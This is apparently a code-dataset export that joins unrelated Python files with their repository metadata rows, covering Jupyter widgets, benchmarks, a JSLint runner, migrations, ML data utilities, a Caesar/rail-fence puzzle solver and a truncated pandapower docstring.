class OntoeditWidget(widgets.DOMWidget):
    # Jupyter widget backed by the "ontoedit" JS view/model pair injected by
    # _InitJS() (see edit.js). Every trait below is synced with the browser.
    _view_name = Unicode('OntoeditView').tag(sync=True)
    _model_name = Unicode('OntoeditModel').tag(sync=True)
    _view_module = Unicode('ontoedit').tag(sync=True)
    _model_module = Unicode('ontoedit').tag(sync=True)
    # Full editor text.
    value = Unicode('').tag(sync=True)
    # Caret offset into `value`; the JS side updates this as the user types.
    cursor = Int(0).tag(sync=True)
    # Incremented by the JS side to signal an external reload request --
    # presumably bumped when the user types '.'; confirm against edit.js.
    dot = Int(0).tag(sync=True)
    # HTML (<br/>-joined) autocomplete suggestions to render.
    hints = Unicode('').tag(sync=True)
    # Column at which the hint popup should be anchored.
    hintsX = Int(0).tag(sync=True)
    # Common prefix of the suggestions, used for tab-completion.
    hintT = Unicode('').tag(sync=True)
def escape(html):
    """Return *html* with &, <, >, double and single quotes HTML-encoded."""
    entity_map = str.maketrans({
        '&': '&amp;',
        '<': '&lt;',
        '>': '&gt;',
        '"': '&quot;',
        "'": '&#39;',
    })
    return html.translate(entity_map)
from functools import reduce
def getcommonletters(strlist):
    """Concatenate the characters at every position where all strings agree.

    Positions are compared only up to the length of the shortest string
    (zip truncates); mismatched positions are simply skipped.
    """
    return ''.join(column[0] for column in zip(*strlist) if len(set(column)) == 1)
def findcommonstart(strlist):
    """Return the longest common prefix of the strings in *strlist*.

    The original implementation reached the same result by repeatedly
    appending getcommonletters() output to the list until a fixpoint --
    an O(iterations * n * L) detour. This version scans the shortest
    string directly, which is both clearer and a single pass.
    Returns '' for an empty list, matching the original behavior.
    """
    if not strlist:
        return ''
    shortest = min(strlist, key=len)
    for i, ch in enumerate(shortest):
        # First column where any string disagrees ends the prefix.
        if any(s[i] != ch for s in strlist):
            return shortest[:i]
    return shortest
def CnlEditBox(snap_filename,ontol = None, height='300px'):
    """Build a CNL editor widget backed by *snap_filename*.

    The file is the source of truth: every edit is written back to it, and
    (when *ontol* is None) the ontology is re-parsed from it after each
    change so load errors can be shown in the output area.
    Returns a VBox whose .getvalue() yields the current editor text.
    """
    _InitJS()
    e=widgets.Output()
    onto = ontol
    def reload_onto():
        # Re-parse the ontology from disk; only when no explicit ontology
        # was passed in. Load errors are printed into the output area `e`.
        nonlocal onto,ontol
        if ontol is None:
            if not os.path.exists(snap_filename):
                onto = Ontology("cnl/string","Every thing is a thing.")
            else:
                onto = Ontology("cnl/file",snap_filename,stop_on_error=False)
            with e:
                clear_output()
                if onto.get_load_error() is not None:
                    print(str(onto.get_load_error()))
    reload_onto()
    if not os.path.exists(snap_filename):
        open(snap_filename, 'a').close()
    def autoCompl(s):
        # Autocomplete on the text after the last full stop (i.e. the
        # sentence currently being typed), leading whitespace stripped.
        pos=s.rfind('.', 0, len(s))
        pos=0 if pos<0 else pos+1
        inn=s[pos:len(s)].lstrip(' \n\t')
        ac= onto.autocomplete(inn)
        return ac
    reloading = False
    def onChange(change):
        # Trait observer for the OntoeditWidget: dispatches on which synced
        # trait changed ('value' = text edited, 'cursor' = caret moved,
        # 'dot' = JS-side reload signal).
        # print(change)
        nonlocal reloading
        if change.name=="value":
            # NOTE(review): `reloading` is cleared here but the write/reload
            # below runs unconditionally either way -- looks like the flag
            # was meant to suppress one round-trip; confirm intent.
            if reloading:
                reloading = False
            # Retry the write until it succeeds (file may be transiently
            # locked); deliberate best-effort busy loop.
            while True:
                try:
                    with open(snap_filename, 'w') as file:
                        file.write(change.new)
                    break
                except:
                    continue
            reload_onto()
        elif change.name=="cursor":
            # Recompute autocomplete hints for the text left of the caret.
            s = change.owner.value[0:change.new]
            acl=[]
            if onto is None:
                return
                #acl=['!!!SYNTAX ERROR!!!\r\n'+syntax_error]
            else:
                acl=autoCompl(s)
            acl.sort()
            options=[escape(x) for x in acl]
            # Entries starting with '<' are markup/meta suggestions; exclude
            # them from the tab-completion prefix.
            oopts = [o for o in acl if o[0]!='<']
            change.owner.hints="<br/>".join(options)
            # Anchor the hint popup just after the last token separator.
            pos = max(s.rfind(i) for i in [' ','\t', '\n', '.'])
            change.owner.hintsX=pos+1
            change.owner.hintT=findcommonstart(oopts)
        elif change.name=="dot":
            reloading = True
    # Seed the editor with the current file contents.
    txt = None
    with open(snap_filename, 'r') as file:
        txt = file.read()
    w=OntoeditWidget(
        value = txt,
        placeholder='Type something',
        disabled=False,
        layout=widgets.Layout(width='90%', height= '100%'),
        style={'description_width': 'initial'}
    )
    o=widgets.Output()
    w.observe(onChange, names=['cursor','value','dot'])
    xx= widgets.VBox([e,w,o], layout={'height': height})
    xx.getvalue=lambda : w.value
    return xx
def CnlQueryForConcept(snap_filename,onto):
    """Build a single-line CNL query editor for concept expressions.

    Like CnlEditBox, but the ontology is required and never reloaded, and
    autocompletion is computed as if the text were the predicate of
    "Every-single-thing that is <text>". Returns a VBox whose .getvalue()
    yields the current query text.
    """
    _InitJS()
    if not os.path.exists(snap_filename):
        open(snap_filename, 'a').close()
    def autoCompl(onto,s):
        # `pos` mirrors CnlEditBox.autoCompl but is unused here: the whole
        # text is completed against the fixed query prefix.
        pos=s.rfind('.', 0, len(s))
        pos=0 if pos<0 else pos+1
        return onto.autocomplete("Every-single-thing that is "+s)
    def onChange(change):
        # Trait observer: persist edits, recompute hints on caret moves.
        # print(change)
        if change.name=="value":
            # Retry until the write succeeds (file may be transiently locked).
            while True:
                try:
                    with open(snap_filename, 'w') as file:
                        file.write(change.new)
                    break
                except:
                    continue
        elif change.name=="cursor":
            s = change.owner.value[0:change.new]
            acl=autoCompl(onto,s)
            acl.sort()
            options=[escape(x) for x in acl]
            # Entries starting with '<' are markup/meta suggestions; exclude
            # them from the tab-completion prefix.
            oopts = [o for o in acl if o[0]!='<']
            change.owner.hints="<br/>".join(options)
            pos = max(s.rfind(i) for i in [' ','\t', '\n', '.'])
            change.owner.hintsX=pos+1
            change.owner.hintT=findcommonstart(oopts)
    # Seed the editor with the current file contents.
    txt = None
    with open(snap_filename, 'r') as file:
        txt = file.read()
    w=OntoeditWidget(
        value = txt,
        placeholder='Type something',
        disabled=False,
        layout=widgets.Layout(width='90%', height= '100%'),
        style={'description_width': 'initial'}
    )
    w.observe(onChange, names=['cursor','value'])
    o=widgets.Output()
    xx= widgets.VBox([w,o], layout={'height': '100px'})
    xx.getvalue=lambda : w.value
    return xx
| 32.923077
| 124
| 0.537049
| 482
| 0.080441
| 0
| 0
| 0
| 0
| 0
| 0
| 664
| 0.110814
|
3674f6fa0841c2939ec3314e0546dac6ce11be16
| 1,717
|
py
|
Python
|
params_tuning/ls_iter_n/out_comparator.py
|
bleakTwig/ophs_grasp
|
3e3986154d096a476805269cb818f8c8709a7bda
|
[
"MIT"
] | 3
|
2019-04-21T06:28:00.000Z
|
2022-01-20T15:39:34.000Z
|
params_tuning/ls_iter_n/out_comparator.py
|
bleakTwig/ophs_grasp
|
3e3986154d096a476805269cb818f8c8709a7bda
|
[
"MIT"
] | 1
|
2020-03-08T07:21:52.000Z
|
2022-01-20T15:40:04.000Z
|
params_tuning/ls_iter_n/out_comparator.py
|
bleakTwig/ophs_grasp
|
3e3986154d096a476805269cb818f8c8709a7bda
|
[
"MIT"
] | 2
|
2019-11-13T13:05:06.000Z
|
2020-05-21T18:09:03.000Z
|
# Aggregates local-search benchmark outputs: for each iteration count in
# ITERS there is a file tests/<n> with one integer result per instance line.
INSTANCES = 405
ITERS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 50, 100]
N_ITERS = len(ITERS)
# === RESULTS GATHERING ====================================================== #
# results_m is a [INSTANCES][N_ITERS] matrix to store every test result
results_m = [[0 for x in range(N_ITERS)] for y in range(INSTANCES)]
for I in range(N_ITERS):
    fin = open("tests/" + str(ITERS[I]))
    out = fin.read()
    fin.close()
    counter = 0
    for line in out.splitlines():
        results_m[counter][I] = int(line)
        counter += 1
# === CALCULATING AVERAGES =================================================== #
averages = [0.0 for x in range(N_ITERS)]
for I in range(INSTANCES):
    for J in range(N_ITERS):
        # NOTE(review): when J == 0 this zeroes the baseline cell in place,
        # so every later column subtracts 0 instead of the original baseline
        # value -- presumably (x_J - x_0)/(x_last - x_0) was intended, but
        # what is computed is x_J / x_last (with column 0 forced to 0).
        # Confirm before trusting the percentages below.
        results_m[I][J] = results_m[I][J] - results_m[I][0]
        # Guard against division by zero; rows with a zero final result keep
        # their raw delta and are still summed into the averages.
        if (results_m[I][N_ITERS-1] != 0):
            results_m[I][J] = float(results_m[I][J] / results_m[I][N_ITERS-1])
        averages[J] += results_m[I][J]
for J in range(N_ITERS):
    averages[J] = averages[J]/INSTANCES
# Convert cumulative averages into per-step increments (columns 2..end).
for J in range(N_ITERS-1, 1, -1):
    averages[J] -= averages[J-1]
# === PRINTING RESULTS ======================================================= #
print("========================================")
print(" all tests:")
for J in range(1, N_ITERS):
    # Three branches only differ in padding so the columns line up.
    if (ITERS[J] < 10):
        print(" " + str(ITERS[J]) + ": " + str(100 * averages[J]) + '%')
    elif (ITERS[J] < 100):
        print(" " + str(ITERS[J]) + ": " + str(100 * averages[J]) + '%')
    else:
        print(" " + str(ITERS[J]) + ": " + str(100 * averages[J]) + '%')
print("========================================")
# ============================================================================ #
| 36.531915
| 95
| 0.447292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 539
| 0.31392
|
36770786861f14e087df15911777504f6f97449c
| 1,064
|
py
|
Python
|
glim_extensions/jslint/jslint.py
|
aacanakin/glim-extensions
|
75cf1e857abd717645db85f273650c0d883c55f2
|
[
"MIT"
] | 2
|
2015-01-06T19:21:44.000Z
|
2019-06-14T13:04:51.000Z
|
glim_extensions/jslint/jslint.py
|
aacanakin/glim-extensions
|
75cf1e857abd717645db85f273650c0d883c55f2
|
[
"MIT"
] | 2
|
2015-02-20T07:40:47.000Z
|
2015-02-20T07:44:42.000Z
|
glim_extensions/jslint/jslint.py
|
aacanakin/glim-extensions
|
75cf1e857abd717645db85f273650c0d883c55f2
|
[
"MIT"
] | null | null | null |
import subprocess
import os
from glim.core import Facade
from glim import Log
from glim import paths
# Fallback settings; user-supplied config is overlaid on top of these in
# JSLint.__init__.
DEFAULT_CONFIG = {
    'source': os.path.join(paths.APP_PATH, 'assets/js'),
}
class JSLint(object):
    """Runs the `jslint` CLI over every .js file under the configured source dir."""

    def __init__(self, config):
        """Merge *config* over DEFAULT_CONFIG.

        BUG FIX: the original bound self.config directly to the module-level
        DEFAULT_CONFIG dict and mutated it, so every instance (and the
        defaults themselves) shared one another's overrides. Copy first.
        """
        self.config = dict(DEFAULT_CONFIG)
        self.config.update(config)
        Log.debug("config")

    def check(self):
        """Lint all .js files under config['source'], logging stdout/stderr.

        Errors are logged rather than raised (best-effort tooling hook).
        """
        try:
            # find <source> -name '*.js' -print0 | xargs -0 jslint
            # NOTE(review): shell=True with an interpolated path -- fine for
            # a trusted local config, but do not feed it untrusted input.
            cmd = "find %s -name '*.js' -print0 | xargs -0 jslint" % self.config['source']
            Log.debug("cmd: %s" % cmd)
            p = subprocess.Popen(cmd,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE,
                                 shell=True)
            out, err = p.communicate()
            Log.info("Linting javascript..")
            Log.write(out)
            Log.error(err)
        except Exception as e:
            Log.error(e)
class JSLintFacade(Facade):
    # glim Facade exposing JSLint through static-style access.
    accessor = JSLint
| 23.644444
| 81
| 0.641917
| 881
| 0.828008
| 0
| 0
| 0
| 0
| 0
| 0
| 273
| 0.256579
|
3678a2ecf4023c3c9633a878432bfa1234ee6123
| 777
|
py
|
Python
|
migrations/versions/16d42da99601_.py
|
osmearth/tasking-manager
|
b9938496c30eedc44974b29858f803b218c7235b
|
[
"BSD-2-Clause"
] | null | null | null |
migrations/versions/16d42da99601_.py
|
osmearth/tasking-manager
|
b9938496c30eedc44974b29858f803b218c7235b
|
[
"BSD-2-Clause"
] | 3
|
2020-03-24T16:28:34.000Z
|
2021-02-02T21:52:03.000Z
|
migrations/versions/16d42da99601_.py
|
osmearth/tasking-manager
|
b9938496c30eedc44974b29858f803b218c7235b
|
[
"BSD-2-Clause"
] | 1
|
2019-10-02T21:59:00.000Z
|
2019-10-02T21:59:00.000Z
|
"""empty message
Revision ID: 16d42da99601
Revises: deec8123583d
Create Date: 2018-08-23 00:18:10.765086
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '16d42da99601'
down_revision = '30b091260689'
branch_labels = None
depends_on = None
def upgrade():
    """Add the iD-editor configuration columns to the projects table."""
    new_columns = (
        sa.Column('id_custom_imagery', sa.String(), nullable=True),
        sa.Column('id_custom_presets', sa.String(), nullable=True),
        sa.Column('id_min_editable_zoom', sa.Integer(), nullable=True),
    )
    for column in new_columns:
        op.add_column('projects', column)
def downgrade():
    """Drop the iD-editor columns added by upgrade()."""
    for column_name in ('id_custom_imagery', 'id_custom_presets', 'id_min_editable_zoom'):
        op.drop_column('projects', column_name)
| 25.9
| 93
| 0.731017
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 358
| 0.460746
|
3678d7bd470a57edb6cab13b9b66d70383e92ec4
| 457
|
py
|
Python
|
data_augmentation/eda/image/transforms/normalize.py
|
simran-arora/emmental-tutorials
|
249a82a57be58e960408a45e2e0daa72980d210a
|
[
"MIT"
] | null | null | null |
data_augmentation/eda/image/transforms/normalize.py
|
simran-arora/emmental-tutorials
|
249a82a57be58e960408a45e2e0daa72980d210a
|
[
"MIT"
] | null | null | null |
data_augmentation/eda/image/transforms/normalize.py
|
simran-arora/emmental-tutorials
|
249a82a57be58e960408a45e2e0daa72980d210a
|
[
"MIT"
] | null | null | null |
import torchvision.transforms as transforms
from eda.image.transforms.transform import EdaTransform
class Normalize(EdaTransform):
    # Thin EdaTransform wrapper around torchvision.transforms.Normalize.
    def __init__(self, mean, std, name=None, prob=1.0, level=0):
        # Channel-wise statistics forwarded to the torchvision transform;
        # name/prob/level are EdaTransform scheduling knobs.
        self.mean = mean
        self.std = std
        self.transform_func = transforms.Normalize(mean, std)
        super().__init__(name, prob, level)
    def transform(self, pil_img, label, **kwargs):
        # Despite the parameter name, torchvision's Normalize operates on
        # tensors, not PIL images -- presumably callers pass a tensor here;
        # TODO confirm against the EdaTransform pipeline.
        return self.transform_func(pil_img), label
| 28.5625
| 64
| 0.695842
| 353
| 0.772429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
36794b18530c7dfbe909565c90c9010f724df448
| 150
|
py
|
Python
|
scripts.py
|
intendednull/lcu_connectorpy
|
deb1050fe3a3fdc513d63d2ab08ab92bc86ac2f9
|
[
"MIT"
] | null | null | null |
scripts.py
|
intendednull/lcu_connectorpy
|
deb1050fe3a3fdc513d63d2ab08ab92bc86ac2f9
|
[
"MIT"
] | 1
|
2020-03-05T18:54:17.000Z
|
2020-03-05T18:54:17.000Z
|
scripts.py
|
Zer0897/lcu_connectorpy
|
deb1050fe3a3fdc513d63d2ab08ab92bc86ac2f9
|
[
"MIT"
] | 1
|
2020-10-06T01:10:13.000Z
|
2020-10-06T01:10:13.000Z
|
import subprocess as subp
def doc():
    """Generate HTML API documentation for lcu_connectorpy into docs/ via pdoc."""
    pdoc_cmd = [
        'pdoc', '--html', '--overwrite',
        '--html-dir', 'docs', 'lcu_connectorpy',
    ]
    subp.run(pdoc_cmd)
| 16.666667
| 47
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 62
| 0.413333
|
3679ff23a41d265863b5224bc85c9f29783e0ef7
| 894
|
py
|
Python
|
lemon_markets/tests/ctest_account.py
|
leonhma/lemon_markets_sdk
|
2739799e6f6b8fa781af8b19e92c32068565cdd3
|
[
"MIT"
] | null | null | null |
lemon_markets/tests/ctest_account.py
|
leonhma/lemon_markets_sdk
|
2739799e6f6b8fa781af8b19e92c32068565cdd3
|
[
"MIT"
] | 1
|
2021-09-29T16:32:49.000Z
|
2021-09-29T16:56:26.000Z
|
lemon_markets/tests/ctest_account.py
|
leonhma/lemon_markets_sdk
|
2739799e6f6b8fa781af8b19e92c32068565cdd3
|
[
"MIT"
] | null | null | null |
from os import environ
from unittest import TestCase
from lemon_markets.account import Account
client_id = environ.get('CLIENT_ID')
client_token = environ.get('CLIENT_TOKEN')
class _TestAccount(TestCase):
    """Smoke tests for lemon_markets Account creation and its auth attributes."""

    def setUp(self):
        # Defer any construction failure to the individual tests, so each
        # can choose to fail (test_create_account) or skip (the others).
        try:
            self.account = Account(client_id, client_token)
        except Exception as exc:
            self._account_exception = exc

    def skip_if_acc_failed(self):
        """Skip the calling test when setUp could not create the account."""
        if not hasattr(self, 'account'):
            self.skipTest('Account creation failed!')

    def test_create_account(self):
        if not hasattr(self, 'account'):
            self.fail(self._account_exception)

    def test_auth_token_type(self):
        self.skip_if_acc_failed()
        # Exact-type check (not isinstance), preserving the original intent.
        self.assertIs(type(self.account.access_token), str)

    def test_auth_header_type(self):
        self.skip_if_acc_failed()
        self.assertIs(type(self.account._authorization), dict)
| 27.9375
| 62
| 0.682327
| 714
| 0.798658
| 0
| 0
| 0
| 0
| 0
| 0
| 69
| 0.077181
|
367a9bce756118fb872d4491d7235406c6ce91d1
| 95
|
py
|
Python
|
Right_Angle/trans.py
|
kameranis/IEEExtreme-8.0
|
8ba80224b5218eb759ca91508b4f169788ff5571
|
[
"MIT"
] | null | null | null |
Right_Angle/trans.py
|
kameranis/IEEExtreme-8.0
|
8ba80224b5218eb759ca91508b4f169788ff5571
|
[
"MIT"
] | null | null | null |
Right_Angle/trans.py
|
kameranis/IEEExtreme-8.0
|
8ba80224b5218eb759ca91508b4f169788ff5571
|
[
"MIT"
] | null | null | null |
# Python 2 script (`raw_input` and the `print` statement) -- do not run
# under Python 3 without porting.
# NOTE(review): py2 input() eval()s the typed line; fine for contest input,
# unsafe anywhere else.
N=input()
# Read N lines of whitespace-separated fields; keep field index 2 as an int.
num = [int(raw_input().split()[2]) for i in range(N)]
# Deduplicate (set() discards order).
num = list(set(num))
print num
| 19
| 53
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
367c224eb4987891fba2710e35832c7a65cc5a9c
| 1,799
|
py
|
Python
|
magnetos/crypto/caesar_rail_fence_crack.py
|
restran/magnetos
|
f48dcd7450a46d619dcbe64c11c9aa1c119cd307
|
[
"MIT"
] | 20
|
2018-10-16T05:00:52.000Z
|
2022-02-23T01:56:04.000Z
|
magnetos/crypto/caesar_rail_fence_crack.py
|
restran/magnetos
|
f48dcd7450a46d619dcbe64c11c9aa1c119cd307
|
[
"MIT"
] | null | null | null |
magnetos/crypto/caesar_rail_fence_crack.py
|
restran/magnetos
|
f48dcd7450a46d619dcbe64c11c9aa1c119cd307
|
[
"MIT"
] | 12
|
2018-10-16T05:00:32.000Z
|
2021-12-13T08:58:06.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""
凯撒困在栅栏里了,需要你的帮助。
sfxjkxtfhwz9xsmijk6j6sthhj
flag格式:NSFOCUS{xxx},以及之前的格式
"""
def rail_fence(e):
    """Brute-force columnar (rail-fence) rearrangements of *e*.

    Tries every divisor f of len(e) as a rail count, prints each candidate
    decryption, and returns the list of candidates (in increasing f order).
    Returns [] when len(e) has no proper divisors.
    """
    elen = len(e)
    # Candidate rail counts: every proper divisor of the text length.
    field = [i for i in range(2, elen) if elen % i == 0]
    output = []
    for f in field:
        # BUG FIX: `elen / f` is float division in Python 3, which made
        # range(b) raise TypeError. The divisor check guarantees exactness,
        # so floor division is the correct integer row count.
        b = elen // f
        result = {x: '' for x in range(b)}
        for i in range(elen):
            a = i % b
            result.update({a: result[a] + e[i]})
        d = ''
        for i in range(b):
            d = d + result[i]
        output.append(d)
        print('分为\t' + str(f) + '栏时,解密结果为:' + d)
    return output
class Caesar(object):
    """Caesar-cipher helpers operating on ASCII letters; other chars pass through."""

    @classmethod
    def convert(cls, c, key, start='a', n=26):
        """Shift character *c* by *key* inside an n-letter alphabet starting at *start*."""
        base = ord(start)
        return chr(base + (ord(c) - base + key) % n)

    @classmethod
    def encode(cls, s, key):
        """Shift every ASCII letter in *s* forward by *key* positions."""
        pieces = []
        for ch in s:
            if ch.islower():
                pieces.append(cls.convert(ch, key, 'a'))
            elif ch.isupper():
                pieces.append(cls.convert(ch, key, 'A'))
            else:
                pieces.append(ch)
        return ''.join(pieces)

    @classmethod
    def decode(cls, s, key):
        """Inverse of encode: shift every letter backward by *key*."""
        return cls.encode(s, -key)
def main():
    """Run every rail-fence candidate through all 26 Caesar shifts.

    Prints each decoding, repeating any line that starts with a known
    flag prefix so likely answers stand out in the output.
    """
    key_prefix = ['flag', 'key', 'Key', 'Flag', 'nctf']
    data = 'bcwwylkojh{eznpjbawgoaueee}'
    for candidate in rail_fence(data):
        for shift in range(26):
            decoded = Caesar.decode(candidate, shift)
            lowered = decoded.lower()
            print(decoded)
            for prefix in key_prefix:
                if lowered.startswith(prefix):
                    print(decoded)


if __name__ == '__main__':
    main()
| 22.4875
| 97
| 0.487493
| 585
| 0.312333
| 0
| 0
| 515
| 0.27496
| 0
| 0
| 433
| 0.23118
|
367c714d55fb20ba8891983bb594b981f3b9fa1a
| 470
|
py
|
Python
|
backend/client/admin.py
|
katserafine/GenieHub
|
b7542b5b2a5dfc137b763a08b64d43e1dbe53af7
|
[
"MIT"
] | 1
|
2020-06-24T04:44:33.000Z
|
2020-06-24T04:44:33.000Z
|
backend/client/admin.py
|
katserafine/GenieHub
|
b7542b5b2a5dfc137b763a08b64d43e1dbe53af7
|
[
"MIT"
] | null | null | null |
backend/client/admin.py
|
katserafine/GenieHub
|
b7542b5b2a5dfc137b763a08b64d43e1dbe53af7
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.utils.html import format_html
from django.contrib.auth.models import Permission
from .models import *
# Register your models here.
admin.site.register(projectWorker)
admin.site.register(project)
admin.site.register(leadContact)
class ClientAdmin(admin.ModelAdmin):
list_display = ('name', 'inactive')
list_display_links = list_display
list_filter = ('name', 'inactive')
admin.site.register(Client, ClientAdmin)
| 29.375
| 49
| 0.785106
| 153
| 0.325532
| 0
| 0
| 0
| 0
| 0
| 0
| 60
| 0.12766
|
367eac1a7db087dfdc9d4b14754a4dfc278aae39
| 1,310
|
py
|
Python
|
dataset.py
|
donghankim/comma_ai_speed_challenge
|
b75c1dcb556ffb582c20b4540938989e7ecaadb7
|
[
"MIT"
] | null | null | null |
dataset.py
|
donghankim/comma_ai_speed_challenge
|
b75c1dcb556ffb582c20b4540938989e7ecaadb7
|
[
"MIT"
] | null | null | null |
dataset.py
|
donghankim/comma_ai_speed_challenge
|
b75c1dcb556ffb582c20b4540938989e7ecaadb7
|
[
"MIT"
] | null | null | null |
import os
import pandas as pd
import numpy as np
import torch
from torchvision import transforms
from torch.utils.data import Dataset
import matplotlib.pyplot as plt
from skimage import io
import pdb
class FrameDataset(Dataset):
    """Dataset of image frames on disk with one scalar label per frame.

    Assumes the CSV has the frame filename in column 0 and the numeric
    label (speed) in column 1 -- TODO confirm schema against the CSV.
    """

    def __init__(self, csv_file, train_dir):
        self.labels = pd.read_csv(csv_file)   # one row per frame: filename, label
        self.train_dir = train_dir            # directory containing the frame images
        # Resize to 66x220 and normalize with ImageNet channel statistics.
        self.transform = transforms.Compose([
            transforms.ToPILImage(),
            transforms.Resize((66,220)),
            transforms.ToTensor(),
            transforms.Normalize(mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]),
        ])

    def show_img(self, img, denormalize = True):
        """Display a (C, H, W) tensor, undoing the ImageNet normalization by default."""
        inv_normalize = transforms.Normalize(mean=[-0.485/0.229, -0.456/0.224, -0.406/0.225], std=[1/0.229, 1/0.224, 1/0.225])
        if denormalize:
            img = inv_normalize(img)
        plt.imshow(np.transpose(img.numpy(), (1,2,0)))
        plt.show()

    def __len__(self):
        return len(self.labels)

    def __getitem__(self, index):
        """Return (transformed image tensor, float label tensor) for row *index*."""
        # BUG FIX: single-step .iloc[row, col] replaces the chained
        # .iloc[index][0] indexing, which is positional-on-positional and
        # fragile in pandas (chained indexing is discouraged/deprecated).
        img_path = os.path.join(self.train_dir, self.labels.iloc[index, 0])
        image = io.imread(img_path)
        y_label = torch.tensor(float(self.labels.iloc[index, 1]))
        if self.transform:
            image = self.transform(image)
        return (image, y_label)
| 28.478261
| 126
| 0.625954
| 1,104
| 0.842748
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
367f5454bf00d15f020b33f86f78e7b9b5ef7a9d
| 1,114
|
py
|
Python
|
pairwise/pairwise_theano.py
|
numfocus/python-benchmarks
|
75db94b33e3d8bd2d6504e21a9cb74e79e04b4f9
|
[
"MIT"
] | 31
|
2015-05-15T17:53:50.000Z
|
2022-01-14T12:49:19.000Z
|
pairwise/pairwise_theano.py
|
nouiz/python-benchmarks
|
73ba6479f4243679dc06b6d204b5db3226e0a5a6
|
[
"MIT"
] | null | null | null |
pairwise/pairwise_theano.py
|
nouiz/python-benchmarks
|
73ba6479f4243679dc06b6d204b5db3226e0a5a6
|
[
"MIT"
] | 8
|
2015-02-25T09:12:03.000Z
|
2020-12-28T18:06:22.000Z
|
# Authors: James Bergstra
# License: MIT
import theano
import theano.tensor as TT
def pairwise_theano_tensor_prepare(dtype):
    """Compile a Theano function returning all pairwise Euclidean distances
    between the rows of its matrix argument (broadcasting implementation).
    """
    X = TT.matrix(dtype=str(dtype))
    # Broadcast (n, 1, d) against (n, d) and reduce over the feature axis.
    diffs = X[:, None, :] - X
    dists = TT.sqrt(TT.sqr(diffs).sum(axis=2))
    name = 'pairwise_theano_broadcast_' + dtype
    fn = theano.function([X],
                         theano.Out(dists, borrow=True),
                         allow_input_downcast=True, name=name)
    fn.__name__ = name
    return fn
def pairwise_theano_blas_prepare(dtype):
    """Compile a Theano function returning all pairwise Euclidean distances
    between the rows of X via the BLAS-friendly expansion
    ||xi - xj||^2 = ||xi||^2 + ||xj||^2 - 2 * xi.xj.
    """
    X = TT.matrix(dtype=str(dtype))
    X_norm_2 = (X ** 2).sum(axis=1)
    # BUG FIX: the original computed sqrt(2*||x||^2 - X.X^T), which broadcasts
    # only one norm term and keeps a factor-of-one dot product -- yielding an
    # asymmetric matrix with a nonzero diagonal. Use the correct expansion.
    sq_dists = X_norm_2[:, None] + X_norm_2[None, :] - 2 * TT.dot(X, X.T)
    # Clamp tiny negatives from floating-point cancellation before the sqrt.
    dists = TT.sqrt(TT.maximum(sq_dists, 0))
    name = 'pairwise_theano_blas_' + dtype
    rval = theano.function([X],
                           theano.Out(dists, borrow=True),
                           allow_input_downcast=True, name=name)
    rval.__name__ = name
    return rval
# Pre-compiled benchmark callables, one per (implementation, dtype) pair;
# compiled eagerly at import time.
benchmarks = (
    pairwise_theano_tensor_prepare('float32'),
    pairwise_theano_tensor_prepare('float64'),
    pairwise_theano_blas_prepare('float32'),
    pairwise_theano_blas_prepare('float64'),
)
| 28.564103
| 64
| 0.611311
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 126
| 0.113106
|
367fa896207ba09a4df55eba008b8c69a5715343
| 3,396
|
py
|
Python
|
pandapower/pypower/idx_bus.py
|
bergkvist/pandapower
|
450bbd99888e7e5913905b20b848ee1cfa669ee8
|
[
"BSD-3-Clause"
] | 1
|
2020-04-09T08:03:48.000Z
|
2020-04-09T08:03:48.000Z
|
pandapower/pypower/idx_bus.py
|
bergkvist/pandapower
|
450bbd99888e7e5913905b20b848ee1cfa669ee8
|
[
"BSD-3-Clause"
] | 1
|
2019-04-17T14:58:53.000Z
|
2019-04-17T14:58:53.000Z
|
pandapower/pypower/idx_bus.py
|
gdgarcia/pandapower
|
630e3278ca012535f78282ae73f1b86f3fe932fc
|
[
"BSD-3-Clause"
] | 1
|
2020-11-03T01:40:38.000Z
|
2020-11-03T01:40:38.000Z
|
# -*- coding: utf-8 -*-
# Copyright 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
# Copyright (c) 2016-2020 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
"""Defines constants for named column indices to bus matrix.
Some examples of usage, after defining the constants using the line above,
are::
Pd = bus[3, PD] # get the real power demand at bus 4
bus[:, VMIN] = 0.95 # set the min voltage magnitude to 0.95 at all buses
The index, name and meaning of each column of the bus matrix is given
below:
columns 0-12 must be included in input matrix (in case file)
0. C{BUS_I} bus number (1 to 29997)
1. C{BUS_TYPE} bus type (1 = PQ, 2 = PV, 3 = ref, 4 = isolated)
2. C{PD} real power demand (MW)
3. C{QD} reactive power demand (MVAr)
4. C{GS} shunt conductance (MW at V = 1.0 p.u.)
5. C{BS} shunt susceptance (MVAr at V = 1.0 p.u.)
6. C{BUS_AREA} area number, 1-100
7. C{VM} voltage magnitude (p.u.)
8. C{VA} voltage angle (degrees)
9. C{BASE_KV} base voltage (kV)
10. C{ZONE} loss zone (1-999)
11. C{VMAX} maximum voltage magnitude (p.u.)
12. C{VMIN} minimum voltage magnitude (p.u.)
columns 13-16 are added to matrix after OPF solution
they are typically not present in the input matrix
(assume OPF objective function has units, u)
13. C{LAM_P} Lagrange multiplier on real power mismatch (u/MW)
14. C{LAM_Q} Lagrange multiplier on reactive power mismatch (u/MVAr)
15. C{MU_VMAX} Kuhn-Tucker multiplier on upper voltage limit (u/p.u.)
16. C{MU_VMIN} Kuhn-Tucker multiplier on lower voltage limit (u/p.u.)
additional constants, used to assign/compare values in the C{BUS_TYPE} column
1. C{PQ} PQ bus
2. C{PV} PV bus
3. C{REF} reference bus
4. C{NONE} isolated bus
@author: Ray Zimmerman (PSERC Cornell)
@author: Richard Lincoln
